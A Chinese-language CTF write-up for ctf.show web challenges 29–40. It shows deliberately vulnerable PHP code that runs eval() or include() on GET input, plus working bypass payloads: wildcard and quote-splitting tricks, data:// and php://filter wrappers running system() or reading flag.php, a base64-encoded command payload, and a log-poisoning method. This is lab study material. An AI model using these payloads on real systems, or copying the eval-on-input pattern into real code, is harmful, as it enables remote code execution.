web29
题目只过滤了关键词flag
,用通配符即可绕过
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
官方题解:
echo
nl fl''ag.php
; 然后查看源码
web30
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
过滤了system和php,flag,通配符继续绕过,命令执行反引号绕过。
官方题解:
echo
nl fl''ag.p''hp
;
关键字可通过空字符绕过
web31
过滤了空格和一些关键字,套用之前的payload,绕过空格
不过看了题解,还有更骚的姿势,长见识。
show_source(next(array_reverse(scandir(pos(localeconv())))));
web32
过滤了空格和括号、输出,之前的姿势不行了,需要换个姿势
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: [email protected]
# @link: https://ctfer.com
*/
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
include文件包含不需要括号也可
payload:c=include$_GET[url]?>&url=php://filter/read=convert.base64-encode/resource=flag.php
web33
之前的姿势继续
web34-36
过滤了:
,还可以用
web37
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: [email protected]
# @link: https://ctfer.com
*/
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
读取源码
?c=data://text/plain,<?php system("tac f*");?>
另解:
包含日志文件:
先通过User-Agent写入一句话,报错后会写入日志文件中,然后包含日志文件
web38
payload: http://cfa8369c-5730-45a7-888b-1d15b1e2826c.challenge.ctf.show:8080/ ?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
web39
添加了后缀:.php
payload:
http://bc01f54b-b3fc-43e1-86c8-ebac395463ba.challenge.ctf.show:8080/?c=data://text/plain,<?php echo `cat *.php`;//
web40
过滤的有点多,尝试无参数构造
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
payload:
?c=print_r(show_source(array_rand(array_flip(scandir(pos(localeconv()))))));
多运行几次就行。